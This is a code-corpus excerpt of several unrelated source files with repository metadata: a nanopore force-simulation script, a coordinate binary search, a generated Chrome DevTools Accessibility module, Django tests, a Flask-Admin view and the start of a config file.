raise Exception("NaN occured in force dict, probably caused by PETSc failure.")
return pnps.get_functionals()
def calculate_forces2D(x0, pid="", clscale=.8, refinement=True, maxcells=default_maxcells2D):
''' calculate forces on molecule depending on midpoint '''
nm = 1e-9 # by convention, nm == 1. in mesh generation script
x0 = map(lambda x:x*nm, x0)
t = Timer("Mesh Generation")
if new_mesh:
generate_mesh(clscale, geo_name2D, pid=pid, x0=x0, **params2D)
meshfile = "/".join([DATADIR, geo_name2D, "mesh", "mesh%s.xml" %pid])
geo = geo_from_name(geo_name2D, mesh=Mesh(comm, meshfile), x0=x0, **params2D)
phys = Physics("pore_molecule", geo, **phys_params)
print "CPU Time (mesh generation):",t.stop()
print "hmin:", geo.mesh.hmin()
if refinement:
t = Timer('PB')
goal = lambda v : phys.Fbare(v, 1) + phys.CurrentPB(v)
pb = LinearPBAxisymGoalOriented(geo, phys, goal=goal)
pb.maxcells = maxcells
pb.marking_fraction = 0.5
pb.solve(refinement=refinement)
print "CPU Time (PB):",t.stop()
t = Timer('PNPS')
geo = pb.geo
v0 = pb.solution
pnps = PNPSAxisym(geo, phys, v0=v0)
else:
t = Timer('PNPS')
pnps = PNPSAxisym(geo, phys)
i = pnps.solve(visualize=False)
while i==50:
print "\nRestarting Newton iteration!"
pnps.__init__(geo, phys)
pnps.solvers["PNP"].newtondamp *= 0.8
i = pnps.solve()
print "Newton iterations:",i
print "CPU Time (PNPS):",t.stop()
pnps.print_results()
#pnps.visualize()
# make forces 3D
f = pnps.get_functionals()
for s in {"Fp", "Fshear", "Fbare", "Fbarevol"}:
f[s+"2"] = f[s+"1"]
f[s+"1"] = 0.
if any(math.isnan(f[s]) for s in f):
raise Exception("NaN occured in force dict, probably caused by PETSc failure.")
return f
def calculate2D(clscale=.8, refinement=True, maxcells=10e4, pid="", **params):
if mpi4py.MPI.COMM_WORLD.Get_size() > 1:
pid = str(mpi4py.MPI.COMM_WORLD.Get_rank())
else:
pid = str(os.getpid())
globals().update(params)
IllposedNonlinearSolver.newtondamp = newtondamp
nm = 1e-9
global params2D, phys_params
params2D["rMolecule"] = r*nm
x0 = params["x0"] if "x0" in params else [0.,0.,z] # see convention
Jkey = "Javgbtm" if x0[2] > 0. else "Javgtop" # TODO: this is customized for Howorka pore
phys_params.update(dict(
Qmol = q*qq,
dnaqsdamp = dnaqsdamp,
bV0 = bV0,
))
if "bV" in params:
phys_params["bV"] = bV
forces = calculate_forces2D(x0, pid=pid, clscale=clscale, refinement=refinement, maxcells=maxcells)
result = {}
result["Fdrag"] = sum(forces[s] for s in ["Fp2", "Fshear2"])
result["Fbare"] = forces["Fbarevol2"]
result["F"] = sum(result[s] for s in ["Fbare", "Fdrag"])
result["J"] = forces[Jkey]
return result
if __name__ == "__main__":
# parse user arguments
parser = argparse.ArgumentParser()
parser.add_argument('x0', default="[0.0, 0.0, 0.0]", help='Molecule position')
parser.add_argument('pid', default="", help='Process ID for .out .msh .xml files')
parser.add_argument('clscale', default=15.0, type=float, help='Scale')
parser.add_argument('dim', default=3, type=int, help='Dimension')
args, unknown = parser.parse_known_args()
#print eval(args.x0), args.pid, args.clscale
print
print "dim =",args.dim
if args.dim==2:
print calculate_forces2D(eval(args.x0), args.pid, args.clscale)
elif args.dim==3:
print calculate_forces(eval(args.x0), args.pid, args.clscale)
| 32.713615
| 103
| 0.648536
|
5c43c46d481286e831943489942a59b6580a1784
| 1,467
|
py
|
Python
|
python/searches/binary_search_array_of_coordinates.py
|
dogunbound/weird_algorithms
|
82770af1b55a81f50a7955fd52b70d8a0ec7c43c
|
[
"MIT"
] | null | null | null |
python/searches/binary_search_array_of_coordinates.py
|
dogunbound/weird_algorithms
|
82770af1b55a81f50a7955fd52b70d8a0ec7c43c
|
[
"MIT"
] | null | null | null |
python/searches/binary_search_array_of_coordinates.py
|
dogunbound/weird_algorithms
|
82770af1b55a81f50a7955fd52b70d8a0ec7c43c
|
[
"MIT"
] | null | null | null |
# takes an array of coordinate tuples and a coordinate tuple
# searches array with a binary search for a matching coordinate tuple
# returns the index of the matching coordinate, or -1 if the search fails
def binary_coord_search(arr, coord):
low=0
high=len(arr)-1
while low <= high:
mid = (low + high) // 2
if arr[mid] == coord:
return mid
if arr[mid][0] > coord[0]:
high = mid - 1
continue
if arr[mid][0] < coord[0]:
low = mid + 1
continue
if arr[mid][1] > coord[1]:
high = mid - 1
continue
if arr[mid][1] < coord[1]:
low = mid + 1
continue
return -1
# Example code to show how it works
import random
rArr = []
# an array of coordinate tuples of random values
MIN_MAX=1000
for i in range(MIN_MAX):
rArr.append((random.randint(-MIN_MAX, MIN_MAX),random.randint(-MIN_MAX, MIN_MAX)))
# binary search requires sorted input: order first on the x coord, then on y
rArr=list(sorted(rArr, key=lambda x:(x[0], x[1])))
# Tests that show it works
for i in range(10):
expected = rArr[random.randint(0,MIN_MAX-1)]
index = binary_coord_search(rArr, expected)
print(expected == rArr[index])
# Failing tests
for i in range(MIN_MAX*1000):
if (i,i) not in rArr: # the 'in' keyword does a linear scan; slow for large lists, but fine for generating failing lookups here
print(binary_coord_search(rArr, (i,i)))
break
| 27.166667 | 119 | 0.612134 |
f355f8561d55938789f567e220547c4e6a06b12f | 15,419 | py | Python | cdp/accessibility.py | auphofBSF/python-chrome-devtools-protocol | a5c6ecea252a0770257c7b2e08479d521ba8d12f | ["MIT"] | 42 | 2019-10-07T17:50:00.000Z | 2022-03-28T17:56:27.000Z | cdp/accessibility.py | auphofBSF/python-chrome-devtools-protocol | a5c6ecea252a0770257c7b2e08479d521ba8d12f | ["MIT"] | 23 | 2019-06-09T19:56:25.000Z | 2022-03-02T01:53:13.000Z | cdp/accessibility.py | auphofBSF/python-chrome-devtools-protocol | a5c6ecea252a0770257c7b2e08479d521ba8d12f | ["MIT"] | 15 | 2019-11-25T10:20:32.000Z | 2022-03-01T21:14:56.000Z |
# DO NOT EDIT THIS FILE!
#
# This file is generated from the CDP specification. If you need to make
# changes, edit the generator and regenerate all of the modules.
#
# CDP domain: Accessibility (experimental)
from __future__ import annotations
from cdp.util import event_class, T_JSON_DICT
from dataclasses import dataclass
import enum
import typing
from . import dom
from . import runtime
class AXNodeId(str):
'''
Unique accessibility node identifier.
'''
def to_json(self) -> str:
return self
@classmethod
def from_json(cls, json: str) -> AXNodeId:
return cls(json)
def __repr__(self):
return 'AXNodeId({})'.format(super().__repr__())
class AXValueType(enum.Enum):
'''
Enum of possible property types.
'''
BOOLEAN = "boolean"
TRISTATE = "tristate"
BOOLEAN_OR_UNDEFINED = "booleanOrUndefined"
IDREF = "idref"
IDREF_LIST = "idrefList"
INTEGER = "integer"
NODE = "node"
NODE_LIST = "nodeList"
NUMBER = "number"
STRING = "string"
COMPUTED_STRING = "computedString"
TOKEN = "token"
TOKEN_LIST = "tokenList"
DOM_RELATION = "domRelation"
ROLE = "role"
INTERNAL_ROLE = "internalRole"
VALUE_UNDEFINED = "valueUndefined"
def to_json(self) -> str:
return self.value
@classmethod
def from_json(cls, json: str) -> AXValueType:
return cls(json)
class AXValueSourceType(enum.Enum):
'''
Enum of possible property sources.
'''
ATTRIBUTE = "attribute"
IMPLICIT = "implicit"
STYLE = "style"
CONTENTS = "contents"
PLACEHOLDER = "placeholder"
RELATED_ELEMENT = "relatedElement"
def to_json(self) -> str:
return self.value
@classmethod
def from_json(cls, json: str) -> AXValueSourceType:
return cls(json)
class AXValueNativeSourceType(enum.Enum):
'''
Enum of possible native property sources (as a subtype of a particular AXValueSourceType).
'''
FIGCAPTION = "figcaption"
LABEL = "label"
LABELFOR = "labelfor"
LABELWRAPPED = "labelwrapped"
LEGEND = "legend"
TABLECAPTION = "tablecaption"
TITLE = "title"
OTHER = "other"
def to_json(self) -> str:
return self.value
@classmethod
def from_json(cls, json: str) -> AXValueNativeSourceType:
return cls(json)
@dataclass
class AXValueSource:
'''
A single source for a computed AX property.
'''
#: What type of source this is.
type_: AXValueSourceType
#: The value of this property source.
value: typing.Optional[AXValue] = None
#: The name of the relevant attribute, if any.
attribute: typing.Optional[str] = None
#: The value of the relevant attribute, if any.
attribute_value: typing.Optional[AXValue] = None
#: Whether this source is superseded by a higher priority source.
superseded: typing.Optional[bool] = None
#: The native markup source for this value, e.g. a <label> element.
native_source: typing.Optional[AXValueNativeSourceType] = None
#: The value, such as a node or node list, of the native source.
native_source_value: typing.Optional[AXValue] = None
#: Whether the value for this property is invalid.
invalid: typing.Optional[bool] = None
#: Reason for the value being invalid, if it is.
invalid_reason: typing.Optional[str] = None
def to_json(self) -> T_JSON_DICT:
json: T_JSON_DICT = dict()
json['type'] = self.type_.to_json()
if self.value is not None:
json['value'] = self.value.to_json()
if self.attribute is not None:
json['attribute'] = self.attribute
if self.attribute_value is not None:
json['attributeValue'] = self.attribute_value.to_json()
if self.superseded is not None:
json['superseded'] = self.superseded
if self.native_source is not None:
json['nativeSource'] = self.native_source.to_json()
if self.native_source_value is not None:
json['nativeSourceValue'] = self.native_source_value.to_json()
if self.invalid is not None:
json['invalid'] = self.invalid
if self.invalid_reason is not None:
json['invalidReason'] = self.invalid_reason
return json
@classmethod
def from_json(cls, json: T_JSON_DICT) -> AXValueSource:
return cls(
type_=AXValueSourceType.from_json(json['type']),
value=AXValue.from_json(json['value']) if 'value' in json else None,
attribute=str(json['attribute']) if 'attribute' in json else None,
attribute_value=AXValue.from_json(json['attributeValue']) if 'attributeValue' in json else None,
superseded=bool(json['superseded']) if 'superseded' in json else None,
native_source=AXValueNativeSourceType.from_json(json['nativeSource']) if 'nativeSource' in json else None,
native_source_value=AXValue.from_json(json['nativeSourceValue']) if 'nativeSourceValue' in json else None,
invalid=bool(json['invalid']) if 'invalid' in json else None,
invalid_reason=str(json['invalidReason']) if 'invalidReason' in json else None,
)
@dataclass
class AXRelatedNode:
#: The BackendNodeId of the related DOM node.
backend_dom_node_id: dom.BackendNodeId
#: The IDRef value provided, if any.
idref: typing.Optional[str] = None
#: The text alternative of this node in the current context.
text: typing.Optional[str] = None
def to_json(self) -> T_JSON_DICT:
json: T_JSON_DICT = dict()
json['backendDOMNodeId'] = self.backend_dom_node_id.to_json()
if self.idref is not None:
json['idref'] = self.idref
if self.text is not None:
json['text'] = self.text
return json
@classmethod
def from_json(cls, json: T_JSON_DICT) -> AXRelatedNode:
return cls(
backend_dom_node_id=dom.BackendNodeId.from_json(json['backendDOMNodeId']),
idref=str(json['idref']) if 'idref' in json else None,
text=str(json['text']) if 'text' in json else None,
)
@dataclass
class AXProperty:
#: The name of this property.
name: AXPropertyName
#: The value of this property.
value: AXValue
def to_json(self) -> T_JSON_DICT:
json: T_JSON_DICT = dict()
json['name'] = self.name.to_json()
json['value'] = self.value.to_json()
return json
@classmethod
def from_json(cls, json: T_JSON_DICT) -> AXProperty:
return cls(
name=AXPropertyName.from_json(json['name']),
value=AXValue.from_json(json['value']),
)
@dataclass
class AXValue:
'''
A single computed AX property.
'''
#: The type of this value.
type_: AXValueType
#: The computed value of this property.
value: typing.Optional[typing.Any] = None
#: One or more related nodes, if applicable.
related_nodes: typing.Optional[typing.List[AXRelatedNode]] = None
#: The sources which contributed to the computation of this property.
sources: typing.Optional[typing.List[AXValueSource]] = None
def to_json(self) -> T_JSON_DICT:
json: T_JSON_DICT = dict()
json['type'] = self.type_.to_json()
if self.value is not None:
json['value'] = self.value
if self.related_nodes is not None:
json['relatedNodes'] = [i.to_json() for i in self.related_nodes]
if self.sources is not None:
json['sources'] = [i.to_json() for i in self.sources]
return json
@classmethod
def from_json(cls, json: T_JSON_DICT) -> AXValue:
return cls(
type_=AXValueType.from_json(json['type']),
value=json['value'] if 'value' in json else None,
related_nodes=[AXRelatedNode.from_json(i) for i in json['relatedNodes']] if 'relatedNodes' in json else None,
sources=[AXValueSource.from_json(i) for i in json['sources']] if 'sources' in json else None,
)
class AXPropertyName(enum.Enum):
'''
Values of AXProperty name:
- from 'busy' to 'roledescription': states which apply to every AX node
- from 'live' to 'root': attributes which apply to nodes in live regions
- from 'autocomplete' to 'valuetext': attributes which apply to widgets
- from 'checked' to 'selected': states which apply to widgets
- from 'activedescendant' to 'owns' - relationships between elements other than parent/child/sibling.
'''
BUSY = "busy"
DISABLED = "disabled"
EDITABLE = "editable"
FOCUSABLE = "focusable"
FOCUSED = "focused"
HIDDEN = "hidden"
HIDDEN_ROOT = "hiddenRoot"
INVALID = "invalid"
KEYSHORTCUTS = "keyshortcuts"
SETTABLE = "settable"
ROLEDESCRIPTION = "roledescription"
LIVE = "live"
ATOMIC = "atomic"
RELEVANT = "relevant"
ROOT = "root"
AUTOCOMPLETE = "autocomplete"
HAS_POPUP = "hasPopup"
LEVEL = "level"
MULTISELECTABLE = "multiselectable"
ORIENTATION = "orientation"
MULTILINE = "multiline"
READONLY = "readonly"
REQUIRED = "required"
VALUEMIN = "valuemin"
VALUEMAX = "valuemax"
VALUETEXT = "valuetext"
CHECKED = "checked"
EXPANDED = "expanded"
MODAL = "modal"
PRESSED = "pressed"
SELECTED = "selected"
ACTIVEDESCENDANT = "activedescendant"
CONTROLS = "controls"
DESCRIBEDBY = "describedby"
DETAILS = "details"
ERRORMESSAGE = "errormessage"
FLOWTO = "flowto"
LABELLEDBY = "labelledby"
OWNS = "owns"
def to_json(self) -> str:
return self.value
@classmethod
def from_json(cls, json: str) -> AXPropertyName:
return cls(json)
@dataclass
class AXNode:
'''
A node in the accessibility tree.
'''
#: Unique identifier for this node.
node_id: AXNodeId
#: Whether this node is ignored for accessibility
ignored: bool
#: Collection of reasons why this node is hidden.
ignored_reasons: typing.Optional[typing.List[AXProperty]] = None
#: This ``Node``'s role, whether explicit or implicit.
role: typing.Optional[AXValue] = None
#: The accessible name for this ``Node``.
name: typing.Optional[AXValue] = None
#: The accessible description for this ``Node``.
description: typing.Optional[AXValue] = None
#: The value for this ``Node``.
value: typing.Optional[AXValue] = None
#: All other properties
properties: typing.Optional[typing.List[AXProperty]] = None
#: IDs for each of this node's child nodes.
child_ids: typing.Optional[typing.List[AXNodeId]] = None
#: The backend ID for the associated DOM node, if any.
backend_dom_node_id: typing.Optional[dom.BackendNodeId] = None
def to_json(self) -> T_JSON_DICT:
json: T_JSON_DICT = dict()
json['nodeId'] = self.node_id.to_json()
json['ignored'] = self.ignored
if self.ignored_reasons is not None:
json['ignoredReasons'] = [i.to_json() for i in self.ignored_reasons]
if self.role is not None:
json['role'] = self.role.to_json()
if self.name is not None:
json['name'] = self.name.to_json()
if self.description is not None:
json['description'] = self.description.to_json()
if self.value is not None:
json['value'] = self.value.to_json()
if self.properties is not None:
json['properties'] = [i.to_json() for i in self.properties]
if self.child_ids is not None:
json['childIds'] = [i.to_json() for i in self.child_ids]
if self.backend_dom_node_id is not None:
json['backendDOMNodeId'] = self.backend_dom_node_id.to_json()
return json
@classmethod
def from_json(cls, json: T_JSON_DICT) -> AXNode:
return cls(
node_id=AXNodeId.from_json(json['nodeId']),
ignored=bool(json['ignored']),
ignored_reasons=[AXProperty.from_json(i) for i in json['ignoredReasons']] if 'ignoredReasons' in json else None,
role=AXValue.from_json(json['role']) if 'role' in json else None,
name=AXValue.from_json(json['name']) if 'name' in json else None,
description=AXValue.from_json(json['description']) if 'description' in json else None,
value=AXValue.from_json(json['value']) if 'value' in json else None,
properties=[AXProperty.from_json(i) for i in json['properties']] if 'properties' in json else None,
child_ids=[AXNodeId.from_json(i) for i in json['childIds']] if 'childIds' in json else None,
backend_dom_node_id=dom.BackendNodeId.from_json(json['backendDOMNodeId']) if 'backendDOMNodeId' in json else None,
)
def disable() -> typing.Generator[T_JSON_DICT,T_JSON_DICT,None]:
'''
Disables the accessibility domain.
'''
cmd_dict: T_JSON_DICT = {
'method': 'Accessibility.disable',
}
json = yield cmd_dict
def enable() -> typing.Generator[T_JSON_DICT,T_JSON_DICT,None]:
'''
Enables the accessibility domain which causes ``AXNodeId``'s to remain consistent between method calls.
This turns on accessibility for the page, which can impact performance until accessibility is disabled.
'''
cmd_dict: T_JSON_DICT = {
'method': 'Accessibility.enable',
}
json = yield cmd_dict
def get_partial_ax_tree(
node_id: typing.Optional[dom.NodeId] = None,
backend_node_id: typing.Optional[dom.BackendNodeId] = None,
object_id: typing.Optional[runtime.RemoteObjectId] = None,
fetch_relatives: typing.Optional[bool] = None
) -> typing.Generator[T_JSON_DICT,T_JSON_DICT,typing.List[AXNode]]:
'''
Fetches the accessibility node and partial accessibility tree for this DOM node, if it exists.
**EXPERIMENTAL**
:param node_id: *(Optional)* Identifier of the node to get the partial accessibility tree for.
:param backend_node_id: *(Optional)* Identifier of the backend node to get the partial accessibility tree for.
:param object_id: *(Optional)* JavaScript object id of the node wrapper to get the partial accessibility tree for.
:param fetch_relatives: *(Optional)* Whether to fetch this nodes ancestors, siblings and children. Defaults to true.
:returns: The ``Accessibility.AXNode`` for this DOM node, if it exists, plus its ancestors, siblings and children, if requested.
'''
params: T_JSON_DICT = dict()
if node_id is not None:
params['nodeId'] = node_id.to_json()
if backend_node_id is not None:
params['backendNodeId'] = backend_node_id.to_json()
if object_id is not None:
params['objectId'] = object_id.to_json()
if fetch_relatives is not None:
params['fetchRelatives'] = fetch_relatives
cmd_dict: T_JSON_DICT = {
'method': 'Accessibility.getPartialAXTree',
'params': params,
}
json = yield cmd_dict
return [AXNode.from_json(i) for i in json['nodes']]
def get_full_ax_tree() -> typing.Generator[T_JSON_DICT,T_JSON_DICT,typing.List[AXNode]]:
'''
Fetches the entire accessibility tree
**EXPERIMENTAL**
:returns:
'''
cmd_dict: T_JSON_DICT = {
'method': 'Accessibility.getFullAXTree',
}
json = yield cmd_dict
return [AXNode.from_json(i) for i in json['nodes']]
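# Hedged driver sketch (not part of the generated module): each command above is a
# generator that yields one JSON-serializable command dict and then expects the
# browser's decoded result payload to be sent back in. "send_to_browser" is a
# hypothetical transport callable; real clients (e.g. trio-cdp) supply their own.
def run_command(cmd_gen, send_to_browser):
    request = next(cmd_gen)            # the yielded {'method': ..., 'params': ...} dict
    response = send_to_browser(request)
    try:
        cmd_gen.send(response)         # resume the generator with the result payload
    except StopIteration as exc:
        return exc.value               # the command's parsed return value, if any

# e.g. nodes = run_command(get_full_ax_tree(), send_to_browser)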
| 33.665939 | 132 | 0.652572 |
97bbbd724296fa99ba54f2b37df53ff8d19c9766 | 2,181 | py | Python | infinity/apps/base/test.py | ra101/Django-Infinity | 9fd17c3c27e1d9f4c1796007b7dc053857edd294 | ["MIT"] | null | null | null | infinity/apps/base/test.py | ra101/Django-Infinity | 9fd17c3c27e1d9f4c1796007b7dc053857edd294 | ["MIT"] | null | null | null | infinity/apps/base/test.py | ra101/Django-Infinity | 9fd17c3c27e1d9f4c1796007b7dc053857edd294 | ["MIT"] | null | null | null |
from uuid import uuid4
from django.urls import reverse
from django.test import tag
from rest_framework import status
from rest_framework.test import APITestCase
from constance.test import override_config as override_live_settings
from infinity.constants import LiveDemoInitialConfig
@tag("home")
class HomeTests(APITestCase):
"""
Test Case(s) for /home.html
"""
request = lambda self: self.client.get(reverse("home"))
def test_successful(self):
"""Successfully ping at the right address"""
response = self.request()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.content, b"Hello World")
@tag("live-url-demo")
class LiveDemoTests(APITestCase):
"""
Test Case(s) for /live_settings/<str:live_url_endpoint>/
"""
request = lambda self, kwargs: self.client.get(
reverse("live-url-demo", kwargs=kwargs)
)
TEST_KEY = str(uuid4())
TEST_VALUE = str(uuid4())
TEST_ENDPOINT = str(uuid4())
def test_default_live_settings(self):
"""Successfully ping at the right address"""
response = self.request(
kwargs={"live_url_endpoint": LiveDemoInitialConfig.ENDPOINT}
)
response_json = response.json()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response_json, {LiveDemoInitialConfig.KEY: LiveDemoInitialConfig.VALUE}
)
@override_live_settings(
LIVE_KEY=TEST_KEY, LIVE_VALUE=TEST_VALUE, LIVE_URL_ENDPOINT=TEST_ENDPOINT
)
def test_update_live_settings(self):
"""Successfully ping at the right address"""
response = self.request(kwargs={"live_url_endpoint": self.TEST_ENDPOINT})
response_json = response.json()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response_json, {self.TEST_KEY: self.TEST_VALUE})
def test_invalid_url_endpoint(self):
"""If Incorrect <URL param> is sent"""
response = self.request(kwargs={"live_url_endpoint": str(uuid4())})
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
| 28.697368 | 83 | 0.694177 |
5bb219bfbf688e249c1129362ecb781b166c9a37 | 523 | py | Python | widgets/create_project/create_project.py | cnralux/qgis-zoa-plugin | f25846ee2d9d563da5e201172c2fb5c220b2952b | ["MIT"] | null | null | null | widgets/create_project/create_project.py | cnralux/qgis-zoa-plugin | f25846ee2d9d563da5e201172c2fb5c220b2952b | ["MIT"] | null | null | null | widgets/create_project/create_project.py | cnralux/qgis-zoa-plugin | f25846ee2d9d563da5e201172c2fb5c220b2952b | ["MIT"] | null | null | null |
'''
Created on 17 sept. 2015
@author: arxit
'''
from __future__ import absolute_import
from builtins import object
import os
from .create_project_dialog import CreateProjectDialog
class CreateProject(object):
'''
Main class for the create project widget
'''
def __init__(self):
'''
Constructor
'''
self.dlg = CreateProjectDialog()
def run(self):
'''
Runs the widget
'''
self.dlg.clear()
self.dlg.show()
| 16.34375 | 54 | 0.57935 |
6f40039ed95c75b2dfde9d4f34ed9813c9f0b13a | 1,989 | py | Python | mac/google-cloud-sdk/lib/surface/compute/sole_tenancy/node_groups/describe.py | bopopescu/cndw | ee432efef88a4351b355f3d6d5350defc7f4246b | ["Apache-2.0"] | 2 | 2019-11-10T09:17:07.000Z | 2019-12-18T13:44:08.000Z | mac/google-cloud-sdk/lib/surface/compute/sole_tenancy/node_groups/describe.py | bopopescu/cndw | ee432efef88a4351b355f3d6d5350defc7f4246b | ["Apache-2.0"] | 4 | 2020-07-21T12:51:46.000Z | 2022-01-22T10:29:25.000Z | mac/google-cloud-sdk/lib/surface/compute/sole_tenancy/node_groups/describe.py | bopopescu/cndw | ee432efef88a4351b355f3d6d5350defc7f4246b | ["Apache-2.0"] | 1 | 2020-07-25T18:17:57.000Z | 2020-07-25T18:17:57.000Z |
# -*- coding: utf-8 -*- #
# Copyright 2018 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Describe node group command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.compute import flags as compute_flags
from googlecloudsdk.command_lib.compute.sole_tenancy.node_groups import flags
class Describe(base.DescribeCommand):
"""Describe a Compute Engine node group."""
detailed_help = {
'brief': 'Describe a Compute Engine node group.',
'EXAMPLES': """
To describe a node group, run:
$ {command} my-node-group
"""
}
@staticmethod
def Args(parser):
flags.MakeNodeGroupArg().AddArgument(parser)
def Run(self, args):
holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
client = holder.client
node_group_ref = flags.MakeNodeGroupArg().ResolveAsResource(
args, holder.resources,
scope_lister=compute_flags.GetDefaultScopeLister(holder.client))
messages = holder.client.messages
request = messages.ComputeNodeGroupsGetRequest(
nodeGroup=node_group_ref.Name(),
project=node_group_ref.project,
zone=node_group_ref.zone)
service = holder.client.apitools_client.nodeGroups
return client.MakeRequests([(service, 'Get', request)])[0]
| 33.711864 | 77 | 0.741076 |
933a4e15875e962de6bfcb218fea9e06912eec2c | 4,042 | py | Python | seldom/testdata/conversion.py | defnngj/pyse | 6dbf080f74440cc10a7d44e87bee0e8cbb4362e2 | ["Apache-2.0"] | 250 | 2015-09-10T09:25:02.000Z | 2019-11-16T12:03:44.000Z | seldom/testdata/conversion.py | ooceann/seldom | 2e2b8855c305e8b8aa16c852517385814e253720 | ["Apache-2.0"] | 13 | 2016-04-22T08:03:04.000Z | 2019-06-03T03:44:54.000Z | seldom/testdata/conversion.py | ooceann/seldom | 2e2b8855c305e8b8aa16c852517385814e253720 | ["Apache-2.0"] | 166 | 2015-07-16T02:51:58.000Z | 2019-11-15T05:12:30.000Z |
"""
Data type conversion of different files
"""
import csv
import json
import yaml
import codecs
from itertools import islice
try:
from openpyxl import load_workbook
except ModuleNotFoundError:
raise ModuleNotFoundError("Please install the library. https://pypi.org/project/openpyxl/")
def _check_data(list_data: list) -> list:
"""
Checking test data format.
:param list_data:
:return:
"""
if isinstance(list_data, list) is False:
raise TypeError("The data format is not `list`.")
if len(list_data) == 0:
raise ValueError("The data format cannot be `[]`.")
if isinstance(list_data[0], dict):
test_data = []
for data in list_data:
line = []
for d in data.values():
line.append(d)
test_data.append(line)
return test_data
else:
return list_data
def csv_to_list(file=None, line=1):
"""
Convert CSV file data to list
:param file: Path to file
:param line: Start line of read data
:return: list data
@data("data.csv", line=1)
def test_login(self, username, password):
print(username)
print(password)
"""
if file is None:
raise FileExistsError("Please specify the CSV file to convert.")
table_data = []
csv_data = csv.reader(codecs.open(file, 'r', 'utf_8_sig'))
for line in islice(csv_data, line - 1, None):
table_data.append(line)
return table_data
def excel_to_list(file=None, sheet="Sheet1", line=1):
"""
Convert Excel file data to list
:param file: Path to file
:param sheet: excel sheet, default name is Sheet1
:param line: Start line of read data
:return: list data
@data("data.xlsx", sheet="Sheet1", line=1)
def test_login(self, username, password):
print(username)
print(password)
"""
if file is None:
raise FileExistsError("Please specify the Excel file to convert.")
excel_table = load_workbook(file)
sheet = excel_table[sheet]
table_data = []
for line in sheet.iter_rows(line, sheet.max_row):
line_data = []
for field in line:
line_data.append(field.value)
table_data.append(line_data)
return table_data
def json_to_list(file, key=None):
"""
Convert JSON file data to list
:param file: Path to file
:param key: Specifies the key for the dictionary
:return: list data
@data("data.json", key="login")
def test_login(self, username, password):
print(username)
print(password)
"""
if file is None:
raise FileExistsError("Please specify the JSON file to convert.")
if key is None:
with open(file, "r", encoding="utf-8") as f:
data = json.load(f)
list_data = _check_data(data)
else:
with open(file, "r", encoding="utf-8") as f:
try:
data = json.load(f)[key]
list_data = _check_data(data)
except KeyError:
raise ValueError("Check the test data, no '{}'".format(key))
return list_data
def yaml_to_list(file, key=None):
"""
    Convert YAML file data to list
:param file: Path to file
:param key: Specifies the key for the dictionary
:return: list data
@data("data.yaml", key="login")
def test_login(self, username, password):
print(username)
print(password)
"""
if file is None:
raise FileExistsError("Please specify the YAML file to convert.")
if key is None:
with open(file, "r", encoding="utf-8") as f:
data = yaml.load(f, Loader=yaml.FullLoader)
list_data = _check_data(data)
else:
with open(file, "r", encoding="utf-8") as f:
try:
data = yaml.load(f, Loader=yaml.FullLoader)[key]
list_data = _check_data(data)
except KeyError:
raise ValueError("Check the test data, no '{}'".format(key))
return list_data
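# Hedged usage sketch (the file names and column layout below are assumptions, not
# part of seldom itself): the converters return plain lists of rows, so they can be
# consumed directly as well as through the @data decorator shown in the docstrings.
if __name__ == "__main__":
    rows = csv_to_list("login.csv", line=2)          # skip an assumed header row
    for username, password in rows:                  # assumes exactly two columns
        print(username, password)
    cases = json_to_list("data.json", key="login")   # assumed key in an assumed file
    print(len(cases), "JSON-driven cases")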
| 27.496599 | 95 | 0.60762 |
2db1b097689c074c5e4d6d75c9eaeb916e740103 | 746 | py | Python | app/controllers/admin/known_ip_model_view.py | politeauthority/simple-honey | a875773c3299044b113c339203c909b6c4391fb4 | ["MIT"] | null | null | null | app/controllers/admin/known_ip_model_view.py | politeauthority/simple-honey | a875773c3299044b113c339203c909b6c4391fb4 | ["MIT"] | 1 | 2021-06-01T21:43:04.000Z | 2021-06-01T21:43:04.000Z | app/controllers/admin/known_ip_model_view.py | politeauthority/simple-honey | a875773c3299044b113c339203c909b6c4391fb4 | ["MIT"] | null | null | null |
"""Known Ip Model View
"""
from flask_admin.form import SecureForm
from app.controllers.admin.base_model_view import BaseModelView
from app.utilities import admin_tools
class KnownIpModelView(BaseModelView):
"""
View Class for KnownIps
"""
page_size = 25
column_type_formatters = admin_tools.default_column_formatters()
column_list = ['ip', 'name', 'last_seen', 'ts_created']
column_searchable_list = ['ip', 'name', 'last_seen', 'ts_created']
column_exclude_list = ['ts_updated', 'notes']
column_default_sort = ('last_seen', True)
form_base_class = SecureForm
form_excluded_columns = ['ts_created', 'ts_updated', 'requests']
# End File: simple-honey/app/controllers/admin/known_ip_model_view.py
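# Hedged registration sketch (names are assumptions): a Flask-Admin instance would
# typically expose this view with something like:
#
#   from flask_admin import Admin
#   admin = Admin(app, name="simple-honey")
#   admin.add_view(KnownIpModelView(KnownIp, db.session))
#
# where "app", "KnownIp" and "db" come from the application factory and models,
# which are not shown in this file.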
| 28.692308 | 70 | 0.730563 |
105a5f8954f1795597bf87fa4e817dcc89a4a5ce | 711 | py | Python | server/config.py | mbucknell/ngwmn-ui | 7d65053a330dc94ec0dbbea251ab55ac7d6ed376 | ["CC0-1.0"] | null | null | null | server/config.py | mbucknell/ngwmn-ui | 7d65053a330dc94ec0dbbea251ab55ac7d6ed376 | ["CC0-1.0"] | null | null | null | server/config.py | mbucknell/ngwmn-ui | 7d65053a330dc94ec0dbbea251ab55ac7d6ed376 | ["CC0-1.0"] | null | null | null |
"""
Application configuration settings
"""
DEBUG = False
SERVICE_ROOT = 'https://cida.usgs.gov'
STATS_SERVICE_ROOT = 'http://cida.usgs.gov/ngwmn_statistics'
CONFLUENCE_URL = 'https://my.usgs.gov/confluence/'
STATISTICS_METHODS_URL = CONFLUENCE_URL + 'createrssfeed.action?types=page&spaces=GWDataPortal&title' \
